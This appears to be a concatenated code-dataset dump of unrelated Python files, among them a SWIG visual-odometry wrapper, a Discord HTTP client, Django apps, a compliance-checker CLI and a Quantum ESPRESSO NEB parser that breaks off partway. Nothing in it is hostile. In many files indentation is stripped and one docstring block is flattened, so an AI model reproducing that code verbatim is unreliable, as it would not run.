__init__(self, size) -> Point3dVector
__init__(self, size, value) -> Point3dVector
"""
this = _viso2.new_Point3dVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.Point3dVector_push_back(self, x)
def front(self):
"""front(self) -> point3d"""
return _viso2.Point3dVector_front(self)
def back(self):
"""back(self) -> point3d"""
return _viso2.Point3dVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.Point3dVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.Point3dVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::point3d >::iterator
insert(self, pos, n, x)
"""
return _viso2.Point3dVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.Point3dVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_capacity(self)
__swig_destroy__ = _viso2.delete_Point3dVector
__del__ = lambda self: None
Point3dVector_swigregister = _viso2.Point3dVector_swigregister
Point3dVector_swigregister(Point3dVector)
class TrackVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::track)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, TrackVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, TrackVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.TrackVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.TrackVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.TrackVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> TrackVector"""
return _viso2.TrackVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.TrackVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.TrackVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.TrackVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> TrackVector
__getitem__(self, i) -> track
"""
return _viso2.TrackVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.TrackVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> track"""
return _viso2.TrackVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.TrackVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.TrackVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.TrackVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.TrackVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type"""
return _viso2.TrackVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.TrackVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::track >::iterator
erase(self, first, last) -> std::vector< Reconstruction::track >::iterator
"""
return _viso2.TrackVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> TrackVector
__init__(self, arg2) -> TrackVector
__init__(self, size) -> TrackVector
__init__(self, size, value) -> TrackVector
"""
this = _viso2.new_TrackVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.TrackVector_push_back(self, x)
def front(self):
"""front(self) -> track"""
return _viso2.TrackVector_front(self)
def back(self):
"""back(self) -> track"""
return _viso2.TrackVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.TrackVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.TrackVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator
insert(self, pos, n, x)
"""
return _viso2.TrackVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.TrackVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_capacity(self)
__swig_destroy__ = _viso2.delete_TrackVector
__del__ = lambda self: None
TrackVector_swigregister = _viso2.TrackVector_swigregister
TrackVector_swigregister(TrackVector)
# This file is compatible with both classic and new-style classes.
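
# ---------------------------------------------------------------------------
# Usage sketch (hand-written addition, not SWIG output): a minimal example of
# driving the stereo visual-odometry wrapper defined above.  The intrinsics
# are illustrative values only, the random frames are placeholders for real
# rectified stereo images, and it is assumed that the SWIG typemaps in the
# interface file accept 8-bit grayscale NumPy arrays in process_frame().
if __name__ == "__main__":
    import numpy as np

    params = Stereo_parameters()
    params.calib.f = 721.5       # focal length [px] (illustrative)
    params.calib.cu = 609.5      # principal point u [px]
    params.calib.cv = 172.8      # principal point v [px]
    params.base = 0.54           # stereo baseline [m]

    vo = VisualOdometryStereo(params)
    pose = Matrix_eye(4)         # accumulated 4x4 camera pose

    for _ in range(2):
        # Placeholder frames; replace with real rectified left/right images.
        left = np.random.randint(0, 256, (480, 640), dtype=np.uint8)
        right = np.random.randint(0, 256, (480, 640), dtype=np.uint8)
        if vo.process_frame(left, right):
            # Chain the frame-to-frame motion into the global pose
            # (the convention used by the libviso2 demo).
            pose = pose * Matrix_inv(vo.getMotion())
            print("matches:", vo.getNumberOfMatches(),
                  "inliers:", vo.getNumberOfInliers())
        else:
            # Expected for the random placeholder frames above.
            print("odometry failed on this frame pair")

    # The wrapped std::vector proxies behave like Python sequences.
    pts = Point3dVector()
    pts.append(point3d(1.0, 2.0, 3.0))
    pts.append(point3d(4.0, 5.0, 6.0))
    print([(p.x, p.y, p.z) for p in pts])
# ---------------------------------------------------------------------------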
iterator(self) -> SwigPyIterator __nonzero__(self) -> bool __bool__(self) -> bool __len__(self) -> std::vector< Reconstruction::track >::size_type __getslice__(self, i, j) -> TrackVector __setslice__(self, i, j) __setslice__(self, i, j, v) __delslice__(self, i, j) __delitem__(self, i) __delitem__(self, slice) __getitem__(self, slice) -> TrackVector __getitem__(self, i) -> track __setitem__(self, slice, v) __setitem__(self, slice) __setitem__(self, i, x) pop(self) -> track append(self, x) empty(self) -> bool size(self) -> std::vector< Reconstruction::track >::size_type swap(self, v) begin(self) -> std::vector< Reconstruction::track >::iterator end(self) -> std::vector< Reconstruction::track >::iterator rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator rend(self) -> std::vector< Reconstruction::track >::reverse_iterator clear(self) get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type pop_back(self) erase(self, pos) -> std::vector< Reconstruction::track >::iterator erase(self, first, last) -> std::vector< Reconstruction::track >::iterator __init__(self) -> TrackVector __init__(self, arg2) -> TrackVector __init__(self, size) -> TrackVector __init__(self, size, value) -> TrackVector push_back(self, x) front(self) -> track back(self) -> track assign(self, n, x) resize(self, new_size) resize(self, new_size, x) insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator insert(self, pos, n, x) reserve(self, n) capacity(self) -> std::vector< Reconstruction::track >::size_type # This file is compatible with both classic and new-style classes. | 1.889153 | 2 |
restcord/http.py | Yandawl/restcord.py | 4 | 9181 | # -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
        return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
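
# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Route joins the API base with a path, and HTTPClient drives the aiohttp session;
# `_request` is a private helper normally wrapped by the package's higher-level clients.
# The token and endpoint below are placeholders.
#
#     route = Route('GET', '/users/@me')   # -> GET https://discord.com/api/users/@me
#
#     async def whoami():
#         async with HTTPClient('<bot-token>') as client:
#             return await client._request(route)
#
#     asyncio.run(whoami())  # requires a valid Discord bot token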
notes/algo-ds-practice/problems/graph/mother_vertex.py | Anmol-Singh-Jaggi/interview-notes | 6 | 9182 | <reponame>Anmol-Singh-Jaggi/interview-notes
'''
What is a Mother Vertex?
A mother vertex in a graph G = (V,E) is a vertex v such that all other vertices in G can be reached by a path from v.
How to find mother vertex?
Case 1:- Undirected Connected Graph : In this case, all the vertices are mother vertices, as we can reach all the other nodes in the graph from any vertex.
Case 2:- Undirected/Directed Disconnected Graph : In this case, there is no mother vertex, as we cannot reach all the other nodes in the graph from any single vertex.
Case 3:- Directed Connected Graph : In this case, we have to find a vertex v in the graph such that we can reach all the other nodes in the graph through a directed path.
SOLUTION:
If a mother vertex (or vertices) exists, then one of the mother vertices is the last finished vertex in DFS. (Equivalently, a mother vertex has the maximum finish time in a DFS traversal.)
A vertex is said to be finished in DFS if a recursive call for its DFS is over, i.e., all descendants of the vertex have been visited.
Algorithm :
Do a DFS traversal of the given graph. While doing the traversal, keep track of the last finished vertex 'v'. This step takes O(V+E) time.
If a mother vertex (or vertices) exists, then v must be one of them. Check that v is indeed a mother vertex by doing a DFS/BFS from v. This step also takes O(V+E) time.
Note that there is no need to literally store the finish time for each vertex.
We can just do:
...
...
if node not in visited:
dfs(node)
latest = node
...
...
# Check if latest is indeed a mother vertex.
'''
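
# A concrete sketch of the approach described above (illustrative; the function and
# variable names are our own, and vertices are assumed to be labelled 0..n-1).
def find_mother_vertex(graph, num_vertices):
    """Return a mother vertex of the directed graph, or None if there is none.

    graph: dict mapping each vertex to the list of its out-neighbours.
    """
    def dfs(start, visited):
        visited.add(start)
        for nxt in graph.get(start, []):
            if nxt not in visited:
                dfs(nxt, visited)

    visited = set()
    latest = None
    for v in range(num_vertices):
        if v not in visited:
            dfs(v, visited)
            latest = v  # vertex whose DFS finished last

    # Verify that the candidate really reaches every vertex.
    reached = set()
    if latest is not None:
        dfs(latest, reached)
    return latest if len(reached) == num_vertices else None


if __name__ == '__main__':
    g = {0: [1], 1: [2], 2: [], 3: [0]}
    print(find_mother_vertex(g, 4))  # -> 3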
app/config.py | MoShitrit/kubernetes-controller-example | 0 | 9183 | <filename>app/config.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
class Config:
api_group = os.environ.get('API_GROUP', 'hello-k8s.s5t.dev')
auth_method = os.environ.get("AUTH_METHOD", "cluster")
examples_plural = os.environ.get('API_PLURAL', 'examples')
examples_version = os.environ.get('API_VERSION', 'v1alpha1')
log_level = os.environ.get("LOG_LEVEL", "INFO")
namespace = os.environ.get('NAMESPACE', 'default')
version = '1.0.0'
def main():
pass
if __name__ == "__main__":
    main()
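
# Example (illustrative): reading the resolved settings elsewhere in the application.
# The import path assumes the package layout implied by this file's location (app/config.py).
#
#     from app.config import Config
#     cfg = Config()
#     cfg.namespace   # "default" unless the NAMESPACE env var is set
#     cfg.api_group   # "hello-k8s.s5t.dev" unless API_GROUP is set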
mechanical_markdown/parsers.py | greenie-msft/mechanical-markdown | 0 | 9184 | <gh_stars>0
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT License.
"""
import re
import yaml
from html.parser import HTMLParser
from mistune import Renderer
from mechanical_markdown.step import Step
start_token = 'STEP'
end_token = 'END_STEP'
ignore_links_token = 'IGNORE_LINKS'
end_ignore_links_token = 'END_IGNORE'
class MarkdownAnnotationError(Exception):
pass
class HTMLCommentParser(HTMLParser):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.comment_text = ""
def handle_comment(self, comment):
self.comment_text += comment
class RecipeParser(Renderer):
def __init__(self, shell, **kwargs):
super().__init__(**kwargs)
self.current_step = None
self.all_steps = []
self.external_links = []
self.ignore_links = False
self.shell = shell
def block_code(self, text, lang):
if (lang is not None and lang.strip() in ('bash', 'sh', 'shell-script', 'shell')
and self.current_step is not None):
self.current_step.add_command_block(text)
return ""
def block_html(self, text):
comment_parser = HTMLCommentParser()
comment_parser.feed(text)
comment_body = comment_parser.comment_text
if comment_body.find(end_token) >= 0:
if self.current_step is None:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_token))
self.all_steps.append(self.current_step)
self.current_step = None
return ""
elif comment_body.find(ignore_links_token) >= 0:
if self.ignore_links:
raise MarkdownAnnotationError(f"Duplicate <!-- {ignore_links_token} --> found")
self.ignore_links = True
elif comment_body.find(end_ignore_links_token) >= 0:
if not self.ignore_links:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_ignore_links_token))
self.ignore_links = False
start_pos = comment_body.find(start_token)
if start_pos < 0:
return ""
if self.current_step is not None:
raise MarkdownAnnotationError(f"<!-- {start_token} --> found while still processing previous step")
start_pos += len(start_token)
self.current_step = Step(yaml.safe_load(comment_body[start_pos:]), self.shell)
return ""
def link(self, link, text=None, title=None):
if re.match("https?://", link) is not None:
            self.external_links.append((link, self.ignore_links))
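
# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Assumes mistune 1.x, where mistune.Markdown(renderer=...) drives the Renderer subclass
# above; the sample document and shell value are placeholders.
#
#     import mistune
#
#     doc = (
#         "<!-- STEP\nname: say hello\n-->\n"
#         "```bash\necho hello\n```\n"
#         "<!-- END_STEP -->\n"
#     )
#     recipe = RecipeParser(shell='bash')
#     mistune.Markdown(renderer=recipe)(doc)
#     # recipe.all_steps now holds one Step containing the `echo hello` command block.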
cchecker.py | jakepolatty/compliance-checker | 0 | 9185 | <filename>cchecker.py<gh_stars>0
#!/usr/bin/env python
from __future__ import print_function
import argparse
import sys
from compliance_checker.runner import ComplianceChecker, CheckSuite
from compliance_checker.cf.util import download_cf_standard_name_table
from compliance_checker import __version__
def main():
# Load all available checker classes
check_suite = CheckSuite()
check_suite.load_all_available_checkers()
parser = argparse.ArgumentParser()
parser.add_argument('--test', '-t', '--test=', '-t=', default=[],
action='append',
help=("Select the Checks you want to perform. Defaults to 'acdd'"
" if unspecified. Versions of standards can be specified via "
"`-t <test_standard>:<version>`. If `<version>` is omitted, or "
"is \"latest\", the latest version of the test standard is used."))
parser.add_argument('--criteria', '-c',
help=("Define the criteria for the checks. "
"Either Strict, Normal, or Lenient. Defaults to Normal."),
nargs='?', default='normal',
choices=['lenient', 'normal', 'strict'])
parser.add_argument('--verbose', '-v',
help="Increase output. May be specified up to three times.",
action="count",
default=0)
parser.add_argument('--skip-checks', '-s',
help="Specifies tests to skip",
action='append')
parser.add_argument('-f', '--format', default=[], action='append',
help=("Output format(s). Options are 'text', 'html', 'json', 'json_new'."
" The difference between the 'json' and the 'json_new'"
" formats is that the 'json' format has the check as the top level"
" key, whereas the 'json_new' format has the dataset name(s) as the"
" main key in the output follow by any checks as subkeys. Also, "
"'json' format can be only be run against one input file, whereas "
"'json_new' can be run against multiple files."))
parser.add_argument('-o', '--output', default=[], action='append',
help=("Output filename(s). If '-' is supplied, output to stdout."
" Can either be one or many files. If one file is supplied,"
" but the checker is run against many files, all the output"
" from the checks goes to that file (does not presently work "
"with 'json' format). If more than one output file is "
"supplied, the number of input datasets supplied must match "
"the number of output files."))
parser.add_argument('-V', '--version', action='store_true',
help='Display the IOOS Compliance Checker version information.')
parser.add_argument('dataset_location', nargs='*',
help="Defines the location of the dataset to be checked.")
parser.add_argument('-l', '--list-tests', action='store_true',
help='List the available tests')
parser.add_argument('-d', '--download-standard-names',
help=("Specify a version of the cf standard name table"
" to download as packaged version"))
args = parser.parse_args()
if args.version:
print("IOOS compliance checker version %s" % __version__)
return 0
if args.list_tests:
print("IOOS compliance checker available checker suites:")
for checker in sorted(check_suite.checkers.keys()):
version = getattr(check_suite.checkers[checker],
'_cc_checker_version', "???")
if args.verbose:
print(" - {} (v{})".format(checker, version))
elif ':' in checker and not checker.endswith(':latest'): # Skip the "latest" output
print(" - {}".format(checker))
return 0
if args.download_standard_names:
download_cf_standard_name_table(args.download_standard_names)
# Check the number of output files
if not args.output:
args.output = '-'
output_len = len(args.output)
if not (output_len == 1 or output_len == len(args.dataset_location)):
print('The number of output files must either be one or the same as the number of datasets', file=sys.stderr)
sys.exit(2)
# Check the output formats
format_choices = ['text', 'html', 'json', 'json_new']
for out_format in args.format:
if out_format not in format_choices:
print(("Error: argument -f/--format: invalid choice: '{}'"
" (choose from 'text', 'html', 'json', 'json_new')".format(out_format)))
sys.exit(2)
# Run the compliance checker
# 2 modes, concatenated output file or multiple output files
return_values = []
had_errors = []
if output_len == 1:
if args.format != 'json':
print("Running Compliance Checker on the datasets from: {}".format(args.dataset_location), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker(args.dataset_location,
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
args.output[0],
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
else:
for output, dataset in zip(args.output, args.dataset_location):
if args.format != 'json':
print("Running Compliance Checker on the dataset from: {}".format(dataset), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker([dataset],
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
output,
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
if any(had_errors):
return 2
if all(return_values):
return 0
return 1
if __name__ == "__main__":
    sys.exit(main())
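
# Example invocations (illustrative; the flags correspond to the argparse options above,
# and the .nc file names are placeholders):
#
#   python cchecker.py --test=acdd dataset.nc
#   python cchecker.py -t cf:1.6 -f html -o report.html dataset.nc
#   python cchecker.py -t acdd -t cf -f json_new -o - file1.nc file2.nc
#   python cchecker.py -l          # list the available checker suites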
apps/articles/cms_apps.py | creimers/djangocms-delete-error | 0 | 9186 | from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import gettext as _
class CategoriesAppHook(CMSApp):
name = _("Categories")
def get_urls(self, page=None, language=None, **kwargs):
return ["apps.articles.urls"]
apphook_pool.register(CategoriesAppHook)
bouncer/blacklist/signals.py | sourcelair/bouncer-api | 0 | 9187 | <gh_stars>0
from django.db.models.signals import pre_save
from django.dispatch import receiver
from blacklist import models
from hashlib import sha256
@receiver(pre_save, sender=models.EmailEntry)
def email_entry_handler(sender, instance, **kwargs):
"""
    Handler that assigns entry_value.lower() to lower_case_entry_value and stores its SHA-256 hex digest in hashed_value.
"""
instance.lower_case_entry_value = instance.entry_value.lower()
email_hasher = sha256(instance.lower_case_entry_value.encode())
instance.hashed_value = email_hasher.hexdigest().lower()
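# Illustration of the handler above: an EmailEntry saved with entry_value
# "User@Example.COM" ends up with lower_case_entry_value "user@example.com" and
# hashed_value equal to sha256(b"user@example.com").hexdigest() (example address only).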
@receiver(pre_save, sender=models.IPEntry)
@receiver(pre_save, sender=models.EmailHostEntry)
def entry_handler(instance, **kwargs):
"""
Handler that assigns to lower_case_entry_value the entry_value.lower()
"""
    instance.lower_case_entry_value = instance.entry_value.lower()
app/boardgames/migrations/0001_initial.py | collaer/boardgames | 0 | 9188 | # Generated by Django 3.1 on 2020-08-22 17:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BoardGame',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('eidtion_year', models.IntegerField()),
('designer', models.CharField(max_length=30)),
('game_duration_min', models.IntegerField()),
('player_number', models.IntegerField()),
('rating', models.IntegerField(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')])),
('played', models.BooleanField()),
('acquisition_date', models.DateField()),
],
),
    ]
matcher/utils.py | BlueRidgeLabs/slack-meetups | 12 | 9189 | import re
# regex for a user or channel mention at the beginning of a message
# example matches: " <@UJQ07L30Q> ", "<#C010P8N1ABB|interns>"
# interactive playground: https://regex101.com/r/2Z7eun/2
MENTION_PATTERN = r"(?:^\s?<@(.*?)>\s?)|(?:^\s?<#(.*?)\|.*?>\s?)"
def get_set_element(_set):
"""get the element from the set to which the iterator points; returns an
arbitrary item
"""
for element in _set:
return element
def get_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the passed user ID
"""
if match.person_1.user_id == user_id:
return match.person_1
elif match.person_2.user_id == user_id:
return match.person_2
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def get_other_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the user who is NOT
the passed user ID (i.e. the other Person)
"""
if match.person_1.user_id == user_id:
return match.person_2
elif match.person_2.user_id == user_id:
return match.person_1
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def blockquote(message):
"""return `message` with markdown blockquote formatting (start each line
with "> ")
"""
if message:
return re.sub(r"^", "> ", message, flags=re.MULTILINE)
else:
return None
def get_mention(message):
"""get the user or channel ID mentioned at the beginning of a message, if
any
"""
match = re.search(MENTION_PATTERN, message)
if match:
# return the first not-None value in the match group tuple, be it a
# user or channel mention
# https://stackoverflow.com/a/18533669
return next(group for group in match.group(1, 2) if group is not None)
else:
return None
def remove_mention(message):
"""remove the user or channel mention from the beginning of a message, if
any
"""
    return re.sub(MENTION_PATTERN, "", message, count=1)
# To be replaced with GMS's exact dialogue.
# Following dialogue has been edited from DeepL on JMS's dialogue transcript (no KMS footage anywhere):
# https://kaengouraiu2.blog.fc2.com/blog-entry-46.html
recoveredMemory = 7081
darkLord = 1052001
sm.setSpeakerID(darkLord)
sm.sendNext("The way you moved without a trace...you must have exceptional talent. "
"Long time no see, #h #.")
sm.sendSay("Since when did you grow up to this point? You're no less inferior to any Dark Lord. "
"You were just a greenhorn that couldn't even hide their presence...Hmph, well, it's been a while since then. "
"Still, it feels weird to see you become so strong. I guess this is how it feels to be proud.")
sm.sendSay("But don't let your guard down. Know that there's still more progress to be made. "
"As the one who has made you into a thief, I know you that you can be even stronger...!")
sm.startQuest(parentID)
sm.completeQuest(parentID)
sm.startQuest(recoveredMemory)
sm.setQRValue(recoveredMemory, "1", False)
student/urls.py | rummansadik/Admission-Automation | 0 | 9191 | from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
aiida_quantumespresso/parsers/neb.py | lin-cp/aiida-quantumespresso | 0 | 9192 | <gh_stars>0
# -*- coding: utf-8 -*-
from aiida.common import NotExistent
from aiida.orm import Dict
from aiida_quantumespresso.calculations.pw import PwCalculation
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure
from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb
from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout
from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries
from aiida_quantumespresso.parsers.parse_xml.exceptions import XMLParseError, XMLUnsupportedFormatError
from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml
from aiida_quantumespresso.parsers.pw import PwParser
from .base import Parser
class NebParser(Parser):
"""`Parser` implementation for the `NebCalculation` calculation job class."""
def parse(self, **kwargs):
"""Parse the retrieved files of a completed `NebCalculation` into output nodes.
Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files
permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files`
which should contain the temporary retrieved files.
"""
import os
from aiida.orm import ArrayData, TrajectoryData
import numpy
PREFIX = self.node.process_class._PREFIX
retrieved = self.retrieved
list_of_files = retrieved.list_object_names() # Note: this includes folders, but not the files they contain.
# The stdout is required for parsing
filename_stdout = self.node.get_attribute('output_filename')
if filename_stdout not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# Look for optional settings input node and potential 'parser_options' dictionary within it
# Note that we look for both NEB and PW parser options under "inputs.settings.parser_options";
# we don't even have a namespace "inputs.pw.settings".
try:
settings = self.node.inputs.settings.get_dict()
parser_options = settings[self.get_parser_settings_key()]
except (AttributeError, KeyError, NotExistent):
settings = {}
parser_options = {}
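        # For reference (illustrative, not exhaustive): `parser_options` may carry flags
        # such as {'all_iterations': True, 'all_symmetries': False}, which are consumed
        # further down in this method when building the outputs.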
# load the pw input parameters dictionary
pw_input_dict = self.node.inputs.pw__parameters.get_dict()
# load the neb input parameters dictionary
neb_input_dict = self.node.inputs.parameters.get_dict()
# First parse the Neb output
try:
stdout = retrieved.get_object_content(filename_stdout)
neb_out_dict, iteration_data, raw_successful = parse_raw_output_neb(stdout, neb_input_dict)
# TODO: why do we ignore raw_successful ?
except (OSError, QEOutputParsingError):
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
for warn_type in ['warnings', 'parser_warnings']:
for message in neb_out_dict[warn_type]:
self.logger.warning(f'parsing NEB output: {message}')
if 'QE neb run did not reach the end of the execution.' in neb_out_dict['parser_warnings']:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_INCOMPLETE)
# Retrieve the number of images
try:
num_images = neb_input_dict['num_of_images']
except KeyError:
try:
num_images = neb_out_dict['num_of_images']
except KeyError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
if num_images < 2:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
# Now parse the information from the individual pw calculations for the different images
image_data = {}
positions = []
cells = []
# for each image...
for i in range(num_images):
# check if any of the known XML output file names are present, and parse the first that we find
relative_output_folder = os.path.join(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')
retrieved_files = self.retrieved.list_object_names(relative_output_folder)
